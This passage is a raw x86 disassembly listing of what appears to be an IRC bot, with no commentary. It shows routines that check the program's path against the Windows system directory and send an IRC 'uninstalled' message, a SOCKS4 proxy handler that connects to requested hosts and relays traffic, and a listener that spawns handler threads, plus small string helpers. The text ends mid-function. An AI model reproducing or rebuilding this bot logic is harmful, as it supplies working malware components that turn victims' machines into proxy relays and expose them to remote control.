pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call ds:dword_41707C ; CreateProcessA
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407148 proc near ; CODE XREF: sub_402A32+7BB�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp ds:off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push ds:off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset dword_41EBFC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset dword_41EBFC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset dword_41EBFC
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40732D proc near ; DATA XREF: sub_40764D+145�o
var_16F0 = dword ptr -16F0h
var_16EC = dword ptr -16ECh
var_16E8 = dword ptr -16E8h
var_16E4 = dword ptr -16E4h
var_16E0 = byte ptr -16E0h
var_6E0 = byte ptr -6E0h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_5CF = byte ptr -5CFh
var_5CE = dword ptr -5CEh
var_5C8 = byte ptr -5C8h
var_1C8 = dword ptr -1C8h
var_1BE = byte ptr -1BEh
var_1AE = byte ptr -1AEh
var_1B = byte ptr -1Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_1C8]
mov [ebp+var_5D4], eax
push 0
push 408h
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40738F
cmp [ebp+var_8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: sub_40732D+5A�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: sub_40732D+60�j
movzx eax, [ebp+var_5D0]
cmp eax, 4
jnz short loc_4073BA
movzx eax, [ebp+var_5CF]
cmp eax, 1
jnz short loc_4073BA
mov [ebp+var_16EC], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: sub_40732D+73�j
; sub_40732D+7F�j
and [ebp+var_16EC], 0
loc_4073C1: ; CODE XREF: sub_40732D+8B�j
mov eax, [ebp+var_16EC]
mov [ebp+var_4], eax
movsx eax, [ebp+var_1BE]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp+var_1BE]
push eax
lea eax, [ebp+var_5C8]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and [ebp+var_4], 0
loc_4073F5: ; CODE XREF: sub_40732D+A6�j
; sub_40732D+C2�j
movsx eax, [ebp+var_1B]
test eax, eax
jz short loc_407456
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_5D4]
call sub_4044F7
pop ecx
pop ecx
cmp [ebp+var_4], 0
jz short loc_407423
mov [ebp+var_16F0], offset byte_41DF00
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_40732D+E8�j
mov [ebp+var_16F0], offset dword_418EEC
loc_40742D: ; CODE XREF: sub_40732D+F4�j
push [ebp+var_16F0]
movzx eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_6E0]
push eax
push offset dword_418EB8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: sub_40732D+CE�j
cmp [ebp+var_4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: sub_40732D+12D�j
push 0Ah
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE]
call ds:dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_5DC]
push eax
push [ebp+var_5CE+2]
call ds:dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_5E0], eax
push 8
push 0
lea eax, [ebp+var_5D0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp [ebp+var_5E0], 0
jnz short loc_407537
mov [ebp+var_5CF], 5Bh
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5D4]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_40732D+1D7�j
mov [ebp+var_5CF], 5Ah
push 8
lea eax, [ebp+var_5D0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
loc_407555: ; CODE XREF: sub_40732D+2FD�j
push [ebp+var_5D4]
call sub_40447B
pop ecx
test eax, eax
jz short loc_4075BD
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call ds:dword_417248 ; recv
mov [ebp+var_16E4], eax
cmp [ebp+var_16E4], 0
jz short loc_407597
cmp [ebp+var_16E4], 0FFFFFFFFh
jnz short loc_40759C
loc_407597: ; CODE XREF: sub_40732D+25F�j
jmp loc_40762F
; ---------------------------------------------------------------------------
loc_40759C: ; CODE XREF: sub_40732D+268�j
push [ebp+var_16E4]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4075BD
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_4075BD: ; CODE XREF: sub_40732D+236�j
; sub_40732D+28C�j
push [ebp+var_5E0]
call sub_40447B
pop ecx
test eax, eax
jz short loc_407622
push 0
push 1000h
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5E0]
call ds:dword_417248 ; recv
mov [ebp+var_16E8], eax
cmp [ebp+var_16E8], 0
jz short loc_4075FF
cmp [ebp+var_16E8], 0FFFFFFFFh
jnz short loc_407601
loc_4075FF: ; CODE XREF: sub_40732D+2C7�j
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407601: ; CODE XREF: sub_40732D+2D0�j
push [ebp+var_16E8]
lea eax, [ebp+var_16E0]
push eax
push [ebp+var_5D4]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_407622
jmp short loc_40762F
; ---------------------------------------------------------------------------
loc_407622: ; CODE XREF: sub_40732D+29E�j
; sub_40732D+2F1�j
push 32h
call ds:dword_41709C ; Sleep
jmp loc_407555
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_40732D:loc_407597�j
; sub_40732D+28E�j ...
push [ebp+var_5D4]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_40538D
pop ecx
xor eax, eax
locret_407649: ; CODE XREF: sub_40732D+64�j
; sub_40732D+16E�j ...
leave
retn 4
sub_40732D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40764D proc near ; DATA XREF: sub_4077DD+B4�o
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B6 = byte ptr -1B6h
var_1A6 = byte ptr -1A6h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
push 1BDh
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1BC]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jnz short loc_4076A8
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4077D9
; ---------------------------------------------------------------------------
loc_4076A8: ; CODE XREF: sub_40764D+46�j
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset dword_418EF8
lea eax, [ebp+var_1A6]
push eax
call sub_40D53F
add esp, 10h
loc_4076CB: ; CODE XREF: sub_40764D+B9�j
; sub_40764D+E1�j ...
push 3E8h
push [ebp+var_1C4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jnz short loc_4076F8
cmp [ebp+var_1C8], 0
jnz short loc_4076FD
loc_4076F8: ; CODE XREF: sub_40764D+A0�j
jmp loc_4077BF
; ---------------------------------------------------------------------------
loc_4076FD: ; CODE XREF: sub_40764D+A9�j
cmp [ebp+var_1C8], 0FFFFFFFFh
jnz short loc_407708
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407708: ; CODE XREF: sub_40764D+B7�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1CC], eax
cmp [ebp+var_1CC], 0
jnz short loc_407730
push [ebp+var_1C8]
call sub_4053B1
pop ecx
jmp short loc_4076CB
; ---------------------------------------------------------------------------
loc_407730: ; CODE XREF: sub_40764D+D3�j
mov eax, [ebp+var_1CC]
mov ecx, [ebp+var_1C8]
mov [eax], ecx
lea eax, [ebp+var_1BC]
push eax
mov eax, [ebp+var_1CC]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_1B6]
push eax
mov eax, [ebp+var_1CC]
add eax, 0Ah
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 1A3h
lea eax, [ebp+var_1A6]
push eax
mov eax, [ebp+var_1CC]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_1CC]
push offset sub_40732D
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4077BA
push [ebp+var_1CC]
call sub_416B4C ; free
pop ecx
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_4077BA: ; CODE XREF: sub_40764D+153�j
jmp loc_4076CB
; ---------------------------------------------------------------------------
loc_4077BF: ; CODE XREF: sub_40764D:loc_4076F8�j
push [ebp+var_1C4]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_4077D9: ; CODE XREF: sub_40764D+56�j
leave
retn 4
sub_40764D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DD proc near ; CODE XREF: sub_40A9CF+17A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_40780F
push 0Ah
lea eax, [ebp+var_8]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+arg_4], eax
loc_40780F: ; CODE XREF: sub_4077DD+A�j
push 1BDh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_407825
jmp short locret_40789E
; ---------------------------------------------------------------------------
loc_407825: ; CODE XREF: sub_4077DD+44�j
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp [ebp+arg_8], 0
jz short loc_407844
mov eax, [ebp+arg_8]
mov [ebp+var_10], eax
jmp short loc_40784B
; ---------------------------------------------------------------------------
loc_407844: ; CODE XREF: sub_4077DD+5D�j
mov [ebp+var_10], offset byte_41DF00
loc_40784B: ; CODE XREF: sub_4077DD+65�j
push 10h
push [ebp+var_10]
mov eax, [ebp+var_C]
add eax, 0Ah
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 1Ah
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push offset dword_418F2C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_C]
push offset sub_40764D
call sub_4095A4
add esp, 14h
locret_40789E: ; CODE XREF: sub_4077DD+46�j
leave
retn
sub_4077DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078A0 proc near ; CODE XREF: sub_40A9CF+216�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4078B8
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_4078A0+14�j
; sub_4078A0:loc_4078E2�j
cmp [ebp+var_4], 0
jnz short loc_4078C0
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078C0: ; CODE XREF: sub_4078A0+1C�j
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4078E0
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
jmp short loc_4078E2
; ---------------------------------------------------------------------------
loc_4078E0: ; CODE XREF: sub_4078A0+33�j
jmp short locret_4078E4
; ---------------------------------------------------------------------------
loc_4078E2: ; CODE XREF: sub_4078A0+3E�j
jmp short loc_4078B8
; ---------------------------------------------------------------------------
locret_4078E4: ; CODE XREF: sub_4078A0+16�j
; sub_4078A0+1E�j ...
leave
retn
sub_4078A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; CODE XREF: sub_407D42+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_4078FC
; ---------------------------------------------------------------------------
loc_4078F5: ; CODE XREF: sub_4078E6:loc_407921�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4078FC: ; CODE XREF: sub_4078E6+D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407923
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_407921
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407921: ; CODE XREF: sub_4078E6+32�j
jmp short loc_4078F5
; ---------------------------------------------------------------------------
loc_407923: ; CODE XREF: sub_4078E6+21�j
mov eax, [ebp+var_8]
leave
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407928 proc near ; CODE XREF: sub_40E618+2B�p
; sub_40E618+185�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_10], 0
jnz short loc_407963
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_8]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
shl eax, 2
push eax
push 0
push [ebp+arg_C]
call sub_416B6A ; memset
add esp, 0Ch
xor eax, eax
jmp locret_407A54
; ---------------------------------------------------------------------------
loc_407963: ; CODE XREF: sub_407928+A�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+arg_0]
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov [ebp+var_8], 1
jmp short loc_4079A1
; ---------------------------------------------------------------------------
loc_40799A: ; CODE XREF: sub_407928:loc_407A4C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4079A1: ; CODE XREF: sub_407928+70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jge loc_407A51
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4-4], 0
jz short loc_407A0A
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_8]
mov [edx+ecx*4], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+eax*4], 0
jz short loc_4079F8
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
mov eax, [ecx+eax*4]
sub eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_4079FC
; ---------------------------------------------------------------------------
loc_4079F8: ; CODE XREF: sub_407928+B8�j
and [ebp+var_C], 0
loc_4079FC: ; CODE XREF: sub_407928+CE�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
mov [ecx+eax*4], edx
jmp short loc_407A4C
; ---------------------------------------------------------------------------
loc_407A0A: ; CODE XREF: sub_407928+90�j
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_8]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
sub eax, [ebp+var_8]
shl eax, 2
push eax
push 0
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_C]
lea eax, [ecx+eax*4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_8]
dec eax
jmp short locret_407A54
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_407928+E0�j
jmp loc_40799A
; ---------------------------------------------------------------------------
loc_407A51: ; CODE XREF: sub_407928+7F�j
mov eax, [ebp+arg_10]
locret_407A54: ; CODE XREF: sub_407928+36�j
; sub_407928+122�j
leave
retn
sub_407928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A56 proc near ; CODE XREF: sub_401146+6B�p
; sub_401146+CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_407A81
cmp ecx, 1
jz short loc_407A7E
loc_407A6E: ; CODE XREF: sub_407A56+26�j
mov al, [esi]
mov [edi], al
test al, al
jz short loc_407A81
inc esi
inc edi
dec ecx
cmp ecx, 1
jnz short loc_407A6E
loc_407A7E: ; CODE XREF: sub_407A56+16�j
mov byte ptr [edi], 0
loc_407A81: ; CODE XREF: sub_407A56+11�j
; sub_407A56+1E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407A56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A86 proc near ; CODE XREF: sub_4097A7+17�p
; sub_4098F3+17�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407A97
; ---------------------------------------------------------------------------
loc_407A90: ; CODE XREF: sub_407A86+3A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407A97: ; CODE XREF: sub_407A86+8�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407AC6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 30h
jl short loc_407AC2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 39h
jg short loc_407AC2
jmp short loc_407A90
; ---------------------------------------------------------------------------
loc_407AC2: ; CODE XREF: sub_407A86+2A�j
; sub_407A86+38�j
xor al, al
jmp short locret_407AC8
; ---------------------------------------------------------------------------
loc_407AC6: ; CODE XREF: sub_407A86+1C�j
mov al, 1
locret_407AC8: ; CODE XREF: sub_407A86+3E�j
leave
retn
sub_407A86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407ACA proc near ; CODE XREF: sub_401000+F6�p
; sub_4148CE+61�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_8]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
and [ebp+var_8], 0
and [ebp+var_C], 0
jmp short loc_407AED
; ---------------------------------------------------------------------------
loc_407AE6: ; CODE XREF: sub_407ACA:loc_407B58�j
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_407AED: ; CODE XREF: sub_407ACA+1A�j
mov eax, [ebp+arg_4]
sub eax, [ebp+var_4]
cmp [ebp+var_C], eax
jg short loc_407B5A
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
add ecx, 20h
cmp eax, ecx
jz short loc_407B37
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_8]
movsx ecx, byte ptr [ecx]
sub ecx, 20h
cmp eax, ecx
jnz short loc_407B58
loc_407B37: ; CODE XREF: sub_407ACA+3F�j
; sub_407ACA+55�j
push [ebp+var_4]
push [ebp+arg_8]
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_407B58
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
jmp short locret_407B5C
; ---------------------------------------------------------------------------
loc_407B58: ; CODE XREF: sub_407ACA+6B�j
; sub_407ACA+84�j
jmp short loc_407AE6
; ---------------------------------------------------------------------------
loc_407B5A: ; CODE XREF: sub_407ACA+2C�j
xor eax, eax
locret_407B5C: ; CODE XREF: sub_407ACA+8C�j
leave
retn
sub_407ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B5E proc near ; CODE XREF: sub_40A2D2+11D�p
; sub_40E943+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_407B70
; ---------------------------------------------------------------------------
loc_407B69: ; CODE XREF: sub_407B5E:loc_407BEE�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407B70: ; CODE XREF: sub_407B5E+9�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407B85
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407B85: ; CODE XREF: sub_407B5E+1D�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_407BA1
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_407BEE
loc_407BA1: ; CODE XREF: sub_407B5E+33�j
and [ebp+var_8], 0
jmp short loc_407BAE
; ---------------------------------------------------------------------------
loc_407BA7: ; CODE XREF: sub_407B5E:loc_407BEC�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_407BAE: ; CODE XREF: sub_407B5E+47�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Dh
jz short loc_407BD2
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
movsx eax, byte ptr [ecx+eax]
cmp eax, 0Ah
jnz short loc_407BE1
loc_407BD2: ; CODE XREF: sub_407B5E+60�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
and byte ptr [ecx+eax], 0
jmp short loc_407BEC
; ---------------------------------------------------------------------------
loc_407BE1: ; CODE XREF: sub_407B5E+72�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
add eax, [ebp+var_8]
jmp short locret_407BF3
; ---------------------------------------------------------------------------
loc_407BEC: ; CODE XREF: sub_407B5E+81�j
jmp short loc_407BA7
; ---------------------------------------------------------------------------
loc_407BEE: ; CODE XREF: sub_407B5E+41�j
jmp loc_407B69
; ---------------------------------------------------------------------------
locret_407BF3: ; CODE XREF: sub_407B5E+25�j
; sub_407B5E+8C�j
leave
retn
sub_407B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BF5 proc near ; CODE XREF: sub_411A09+5D�p
; sub_411A09+F3�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_407BF8: ; CODE XREF: sub_407BF5:loc_407C28�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_0]
inc ecx
mov [ebp+arg_0], ecx
test eax, eax
jz short loc_407C2A
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407C15
